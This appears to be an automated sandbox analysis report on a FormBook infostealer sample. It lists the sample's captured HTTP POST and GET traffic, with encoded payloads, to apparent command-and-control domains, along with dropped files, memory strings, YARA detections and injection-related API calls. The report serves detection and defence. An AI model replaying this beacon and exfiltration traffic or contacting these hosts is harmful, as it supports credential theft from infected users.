          Source: global trafficHTTP traffic detected: POST /sh/ HTTP/1.1Host: www.worldinnovativesolutions.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.worldinnovativesolutions.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.worldinnovativesolutions.com/sh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 46 4c 3d 67 67 59 47 30 45 68 37 7a 67 33 4c 68 73 4e 50 50 43 74 5f 68 65 74 4c 66 5f 4a 4d 36 66 6b 31 58 74 31 76 32 32 38 6c 6d 72 79 67 55 66 4a 78 69 61 65 73 64 77 43 49 4b 77 32 62 46 36 28 73 63 39 72 68 67 70 49 48 4e 6d 4b 76 31 5a 51 2d 34 7a 54 31 32 77 30 7a 4a 63 5a 79 28 35 74 70 68 37 6f 75 36 79 52 6c 47 37 71 72 38 63 57 57 53 53 45 47 32 4d 70 58 61 61 66 75 34 30 67 44 37 68 44 6c 75 32 43 64 69 4f 57 41 76 36 72 71 36 37 28 6a 4c 41 4e 76 61 5a 76 45 41 52 66 7a 67 6e 64 59 76 76 42 68 6a 50 42 75 78 64 58 37 63 44 52 35 6e 6e 4d 44 6c 39 74 6e 6b 50 76 58 73 78 79 50 36 4e 68 68 72 56 34 49 33 74 5a 56 42 77 73 47 4a 55 36 50 73 48 63 6e 35 69 59 72 37 74 78 31 37 30 48 56 4b 59 61 34 44 75 51 34 46 63 68 64 38 44 57 5a 53 4c 5a 30 6e 72 42 4b 52 41 6e 78 4d 51 73 54 31 54 63 73 53 32 6d 4c 7a 37 62 4f 6f 44 63 51 74 31 76 54 33 53 36 72 6e 35 64 46 73 51 64 76 59 44 36 34 73 55 44 78 30 44 6d 6b 50 52 71 54 36 4c 28 51 37 38 42 54 74 4f 53 37 55 71 47 37 69 38 51 51 4c 6e 57 33 79 50 45 6f 46 56 5a 79 50 47 50 5f 66 4b 75 4b 61 34 37 43 4b 56 7a 5f 58 58 39 4a 78 58 34 6c 47 47 47 46 4f 49 67 49 37 5a 71 58 71 71 77 64 71 33 4e 37 67 44 4d 38 33 67 78 69 46 6e 38 37 55 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 8pFL=ggYG0Eh7zg3LhsNPPCt_hetLf_JM6fk1Xt1v228lmrygUfJxiaesdwCIKw2bF6(sc9rhgpIHNmKv1ZQ-4zT12w0zJcZy(5tph7ou6yRlG7qr8cWWSSEG2MpXaafu40gD7hDlu2CdiOWAv6rq67(jLANvaZvEARfzgndYvvBhjPBuxdX7cDR5nnMDl9tnkPvXsxyP6NhhrV4I3tZVBwsGJU6PsHcn5iYr7tx170HVKYa4DuQ4Fchd8DWZSLZ0nrBKRAnxMQsT1TcsS2mLz7bOoDcQt1vT3S6rn5dFsQdvYD64sUDx0DmkPRqT6L(Q78BTtOS7UqG7i8QQLnW3yPEoFVZyPGP_fKuKa47CKVz_XX9JxX4lGGGFOIgI7ZqXqqwdq3N7gDM83gxiFn87Uw).
          Source: global trafficHTTP traffic detected: POST /sh/ HTTP/1.1Host: www.worldinnovativesolutions.comConnection: closeContent-Length: 141254Cache-Control: no-cacheOrigin: http://www.worldinnovativesolutions.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.worldinnovativesolutions.com/sh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 46 4c 3d 67 67 59 47 30 42 45 4b 28 77 36 54 6b 65 6b 39 4d 77 68 61 75 65 35 4e 61 34 52 68 7a 6f 52 54 4a 4f 77 30 32 33 73 68 28 66 58 35 65 66 35 78 6b 5a 32 52 4a 67 43 50 62 67 32 59 42 36 43 46 52 4b 65 69 67 6f 4d 39 4e 67 53 73 76 75 67 5f 37 6a 54 6d 33 51 6f 6c 59 38 4e 70 28 5f 74 36 68 66 4d 32 28 79 4e 6c 59 66 7e 70 35 39 47 4e 52 54 34 4e 28 64 46 57 59 62 6e 33 34 44 35 38 70 79 7e 41 6e 58 4f 44 7a 4e 4b 66 6a 61 62 47 7e 71 6e 6d 46 77 5a 6f 66 65 6e 62 64 43 72 6f 6e 6d 64 6d 79 65 41 54 70 66 5a 30 32 64 6e 4a 4f 43 55 4e 38 58 63 39 6c 2d 64 52 7e 73 36 52 37 48 32 39 35 35 49 36 6a 47 30 47 71 4d 5a 4e 46 7a 45 52 4c 55 4b 67 30 31 45 73 39 32 52 76 36 65 4a 6c 6a 77 4c 59 49 73 71 6b 58 76 4d 4d 49 76 74 56 6a 53 6d 32 62 71 41 75 38 4c 67 46 51 7a 4b 65 43 51 74 33 33 54 63 77 47 6d 32 6a 69 59 32 43 71 53 73 75 74 30 33 45 75 78 7e 49 71 62 70 33 69 56 78 55 61 32 57 6b 30 57 37 5a 6c 79 69 6a 4a 69 32 5a 30 72 28 78 28 35 56 69 74 4f 53 33 55 72 47 42 6a 4e 45 51 4c 33 33 73 79 75 45 6b 44 56 59 6f 44 32 28 68 47 49 37 50 61 38 58 43 4c 67 50 52 57 6d 6c 4a 31 46 77 6d 47 6b 75 46 50 59 67 49 33 35 71 41 6d 5f 52 47 6c 58 42 70 70 43 6c 43 77 67 56 31 4d 31 67 31 49 33 77 50 46 66 76 58 4f 43 34 50 46 4e 59 61 49 66 61 49 6a 52 6f 42 50 4d 41 52 7a 53 32 56 79 33 4c 46 70 66 30 74 30 6d 30 54 4d 72 32 35 39 38 5a 4b 79 55 72 4c 70 45 61 75 4b 35 56 5f 39 71 41 4f 70 79 77 43 4f 54 69 6d 48 70 52 67 55 45 34 57 48 53 28 32 4d 4c 49 37 34 36 78 67 34 32 44 76 56 46 42 54 37 46 76 55 6d 71 78 71 37 51 64 6a 71 74 63 77 32 35 4d 77 6b 65 41 31 4f 57 38 46 66 47 75 53 34 2d 32 6f 75 33 6c 42 61 51 6e 4e 35 44 77 72 43 45 6b 48 4d 37 4f 78 49 36 76 37 4e 30 46 34 6e 47 5a 78 54 64 6a 75 68 6e 69 66 32 70 67 49 65 79 4f 76 66 33 61 68 41 37 7a 74 49 41 73 32 6b 4b 62 6c 34 45 54 79 52 52 6f 6b 52 57 58 7a 57 4b 41 33 32 4a 43 32 58 39 66 61 4f 51 49 32 72 66 6d 62 6b 4d 6d 47 77 56 51 4b 59 68 39 35 62 30 52 31 56 6f 37 77 4b 6d 55 4b 79 6b 33 46 6f 63 5a 39 67 33 6a 68 38 5a 4a 6e 64 72 64 73 63 6b 55 53 67 6f 47 30 64 32 4d 63 59 78 75 32 66 48 6f 62 68 5f 43 71 4d 67 4f 42 6f 47 4a 71 45 63 47 6a 4a 30 48 37 6b 6e 7a 75 68 5f 6c 32 65 31 49 75 74 36 4c 4e 68 35 52 4a 57 65 4a 35 72 69 4a 73 78 48 53 58 4c 67 58 69 70 75 74 4c 49 57 44 56 71 4f 74 4f 62 70 41 4e 58 5a 6b 42 35 38 63 38 70 76 62 46 62 6e 55 58 54 64 49 54 59 6d 68 65 33 61 34 64 67 30 36 34 64 69 52 62 5a 61 56 4a 7a 74 4b 47 4b 48 6b 49 7e 57 67 70 5a 66 7e 4a 72 55 52 39 38 2d 43 58 7e 4e 57 32 61 34 75 4a 55 53
          Source: global trafficHTTP traffic detected: GET /sh/?ers=Ml54sjKpKXO8nzrP&8pFL=5GGoshPm8DtXJbtv0j0CpM0ZScDouSGJSOqUOJNMNiXSV7FSaO+82pviX4ynrFwNCgG8 HTTP/1.1Host: www.abblaster.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh/?ers=Ml54sjKpKXO8nzrP&8pFL=jmVQmi4sjS7ih7V2IoNMh1SkeFqY0dJymV2JACzQPE/qHepWmAmodPcElCzP+DKsrkIQ HTTP/1.1Host: www.poyik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh/?8pFL=LUR8/txceBDtIKNXLiQMutYOIYoLpa/yZvZq3kQ0sBAXqAM4bNfHWEKMD4Yt5BclzbK7&ers=Ml54sjKpKXO8nzrP HTTP/1.1Host: www.zabierzowska.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh/?8pFL=oCU8qkR86wHM4cE0Nkw8zeB5R9pLzrdrR6drjm45vOC9QNVBuIjVP0TQIAKENpCxedHo&ers=Ml54sjKpKXO8nzrP HTTP/1.1Host: www.worldinnovativesolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh/?ers=Ml54sjKpKXO8nzrP&8pFL=5GGoshPm8DtXJbtv0j0CpM0ZScDouSGJSOqUOJNMNiXSV7FSaO+82pviX4ynrFwNCgG8 HTTP/1.1Host: www.abblaster.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.ugrejr.win
          Source: unknownHTTP traffic detected: POST /sh/ HTTP/1.1Host: www.poyik.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.poyik.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.poyik.com/sh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 46 4c 3d 72 45 5a 71 34 47 78 4b 72 30 50 68 35 6f 49 64 65 73 67 44 7e 78 33 47 55 33 79 6d 38 75 52 4f 7a 77 54 4c 57 69 54 71 47 31 28 75 48 74 6c 39 32 51 48 79 57 34 68 79 30 46 62 75 30 79 69 35 69 32 4a 6f 68 63 6e 32 38 74 30 39 56 4e 66 73 61 48 33 4d 59 4c 48 58 68 30 6e 75 6f 30 6c 47 35 6b 59 44 67 45 7a 5f 30 72 4a 68 31 63 28 35 36 72 4f 6b 67 46 6d 38 50 66 37 6e 62 6f 77 6b 38 61 31 51 49 63 66 62 6d 38 44 59 7e 76 74 6e 4a 6a 53 39 72 51 4c 69 48 77 6a 7a 54 33 35 33 78 56 48 49 45 78 59 4e 73 72 59 75 78 42 7e 5a 4a 34 38 56 75 76 5a 69 36 57 48 4f 45 55 56 74 62 44 48 6c 72 59 79 6e 4a 36 35 37 77 65 31 48 36 2d 6a 48 55 64 6b 56 35 4d 39 42 58 4b 62 38 33 58 55 5a 41 6c 71 6a 63 36 4d 78 6c 79 41 35 4d 7a 47 69 7a 6d 44 77 37 71 53 44 55 4a 41 72 75 77 48 52 4a 65 37 50 4a 32 69 38 70 62 4c 31 41 6b 7e 61 63 65 55 30 4e 51 37 68 51 78 76 77 74 79 54 69 57 53 51 51 65 52 77 73 73 53 48 52 49 62 72 64 65 63 65 75 4b 30 56 73 77 75 50 6a 4d 71 44 37 48 52 51 38 74 75 65 32 76 67 64 39 55 4e 43 77 34 6d 77 38 72 61 73 46 73 55 74 69 51 35 6b 45 7e 31 50 44 43 4b 4d 43 50 6f 51 68 6b 45 70 63 54 5f 61 4a 43 69 58 49 6b 51 66 35 56 4f 28 55 6a 4a 77 2d 61 36 35 5a 66 35 45 31 47 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 8pFL=rEZq4GxKr0Ph5oIdesgD~x3GU3ym8uROzwTLWiTqG1(uHtl92QHyW4hy0Fbu0yi5i2Johcn28t09VNfsaH3MYLHXh0nuo0lG5kYDgEz_0rJh1c(56rOkgFm8Pf7nbowk8a1QIcfbm8DY~vtnJjS9rQLiHwjzT353xVHIExYNsrYuxB~ZJ48VuvZi6WHOEUVtbDHlrYynJ657we1H6-jHUdkV5M9BXKb83XUZAlqjc6MxlyA5MzGizmDw7qSDUJAruwHRJe7PJ2i8pbL1Ak~aceU0NQ7hQxvwtyTiWSQQeRwssSHRIbrdeceuK0VswuPjMqD7HRQ8tue2vgd9UNCw4mw8rasFsUtiQ5kE~1PDCKMCPoQhkEpcT_aJCiXIkQf5VO(UjJw-a65Zf5E1Gw).
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000000.1096451624.0000000003230000.00000004.00000001.sdmpString found in binary or memory: http://ns.microsoftom/photo/1.2/tD
          Source: cmmon32.exe, 00000004.00000002.2701122900.00000000001C8000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico=c
          Source: explorer.exe, 00000003.00000002.2705151023.00000000030D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: cmmon32.exe, 00000004.00000002.2701122900.00000000001C8000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: cmmon32.exe, 00000004.00000002.2701122900.00000000001C8000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp%
          Source: cmmon32.exe, 00000004.00000002.2701122900.00000000001C8000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpG
          Source: cmmon32.exe, 00000004.00000002.2701122900.00000000001C8000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
          Source: cmmon32.exe, 00000004.00000002.2701122900.00000000001C8000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/ocid=iehpk
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: cmmon32.exe, 00000004.00000002.2706016664.0000000004A59000.00000004.00000001.sdmpString found in binary or memory: http://www.worldinnovativesolutions.com
          Source: cmmon32.exe, 00000004.00000002.2706016664.0000000004A59000.00000004.00000001.sdmpString found in binary or memory: http://www.worldinnovativesolutions.com/sh/
          Source: explorer.exe, 00000003.00000000.1113021283.000000000B2B6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: cmmon32.exe, 00000004.00000002.2706167615.0000000004D4F000.00000004.00000001.sdmpString found in binary or memory: https://wis-consultancy.com/sh/?8pFL=oCU8qkR86wHM4cE0Nkw8zeB5R9pLzrdrR6drjm45vOC9QNVBuIjVP0TQIAKENpC
          Source: cmmon32.exe, 00000004.00000002.2701122900.00000000001C8000.00000004.00000020.sdmpString found in binary or memory: https://www.msn.com/spartan/ientplocale=en-US&market=US&enableregulatorypsm=0&enablecpsm=0&NTLogo=1&

          Source: bXdiOPDmyZ.exe, 00000000.00000002.1091450755.000000000061A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.1135356975.0000000003E54000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.1553095151.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1553595966.0000000003F04000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1549846475.0000000000401000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2701515168.00000000006D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1552830718.0000000002CE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1132089872.0000000000401000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2701977232.0000000000940000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1134592237.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1550979409.0000000002240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1133021298.00000000020C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.bXdiOPDmyZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.ntbhcfw6lm.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\O-979P0E\O-9logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\O-979P0E\O-9logrf.iniJump to dropped file
          Source: C:\Windows\SysWOW64\cmmon32.exeDropped file: C:\Users\user\AppData\Roaming\O-979P0E\O-9logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.1135356975.0000000003E54000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1135356975.0000000003E54000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.1553095151.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.1553095151.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2705696143.00000000048DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
          Source: 00000012.00000002.1553595966.0000000003F04000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.1553595966.0000000003F04000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.1549846475.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.1549846475.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2701515168.00000000006D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2701515168.00000000006D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.1552830718.0000000002CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.1552830718.0000000002CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1132089872.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1132089872.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2701977232.0000000000940000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2701977232.0000000000940000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1134592237.0000000002AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1134592237.0000000002AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.1550979409.0000000002240000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.1550979409.0000000002240000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1133021298.00000000020C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1133021298.00000000020C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.bXdiOPDmyZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.bXdiOPDmyZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.2.ntbhcfw6lm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 18.2.ntbhcfw6lm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 0_2_03D51CF1 NtProtectVirtualMemory,0_2_03D51CF1
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_00416BC0 NtCreateFile,2_2_00416BC0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_00416C70 NtReadFile,2_2_00416C70
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_00416CF0 NtClose,2_2_00416CF0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_00416DA0 NtAllocateVirtualMemory,2_2_00416DA0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_00416BBB NtCreateFile,2_2_00416BBB
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA240 NtReadFile,LdrInitializeThunk,2_2_201BA240
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA2D0 NtClose,LdrInitializeThunk,2_2_201BA2D0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA360 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_201BA360
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA3E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_201BA3E0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA410 NtQueryInformationToken,LdrInitializeThunk,2_2_201BA410
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA480 NtMapViewOfSection,LdrInitializeThunk,2_2_201BA480
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA4A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_201BA4A0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA540 NtDelayExecution,LdrInitializeThunk,2_2_201BA540
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA560 NtQuerySystemInformation,LdrInitializeThunk,2_2_201BA560
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA5F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_201BA5F0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA610 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_201BA610
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA6A0 NtCreateSection,LdrInitializeThunk,2_2_201BA6A0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA700 NtProtectVirtualMemory,LdrInitializeThunk,2_2_201BA700
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA720 NtResumeThread,LdrInitializeThunk,2_2_201BA720
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA750 NtCreateFile,LdrInitializeThunk,2_2_201BA750
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA800 NtSetValueKey,2_2_201BA800
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BB0B0 NtGetContextThread,2_2_201BB0B0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BBA30 NtSetContextThread,2_2_201BBA30
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA220 NtWaitForSingleObject,2_2_201BA220
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA260 NtWriteFile,2_2_201BA260
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA2F0 NtQueryInformationFile,2_2_201BA2F0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA310 NtEnumerateValueKey,2_2_201BA310
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA350 NtQueryValueKey,2_2_201BA350
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA370 NtQueryInformationProcess,2_2_201BA370
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA3D0 NtCreateKey,2_2_201BA3D0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BB410 NtOpenProcessToken,2_2_201BB410
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA430 NtQueryVirtualMemory,2_2_201BA430
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA470 NtSetInformationFile,2_2_201BA470
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BB470 NtOpenThread,2_2_201BB470
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA460 NtOpenProcess,2_2_201BA460
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BACE0 NtCreateMutant,2_2_201BACE0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA520 NtEnumerateKey,2_2_201BA520
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BBD40 NtSuspendThread,2_2_201BBD40
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA5A0 NtWriteVirtualMemory,2_2_201BA5A0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA650 NtQueueApcThread,2_2_201BA650
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA6D0 NtCreateProcessEx,2_2_201BA6D0
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA710 NtQuerySection,2_2_201BA710
          Source: C:\Users\user\Desktop\bXdiOPDmyZ.exeCode function: 2_2_201BA780 NtOpenDirectoryObject,2_2_201BA780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA800 NtSetValueKey,LdrInitializeThunk,4_2_00ECA800
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA2D0 NtClose,LdrInitializeThunk,4_2_00ECA2D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA260 NtWriteFile,LdrInitializeThunk,4_2_00ECA260
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_00ECA240 NtReadFile,LdrInitializeThunk,4_2_00ECA240
